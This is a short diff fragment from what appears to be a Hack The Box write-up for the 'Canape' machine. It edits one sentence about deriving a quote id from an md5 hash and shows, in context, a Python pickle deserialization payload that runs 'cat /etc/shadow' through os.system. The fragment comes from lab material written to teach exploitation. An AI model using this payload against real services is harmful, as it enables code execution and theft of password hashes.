s0ck37/s0ck37.github.io/_posts/2023-07-28-htb-writeup-canape.md

 exploit = "cos\nsystem\n(S'cat /etc/shadow | head -n 5'\ntR.'\ntR."
 ```

-Now that we have the payload, we need to know the quote id, which is the md5 hash of the `character + quote_id`.
+Now that we have the payload, we need to know the quote id, which is the md5 hash of the `character + quote`.

 ```python
 quote_id = md5(("moe"+quote).encode()).hexdigest()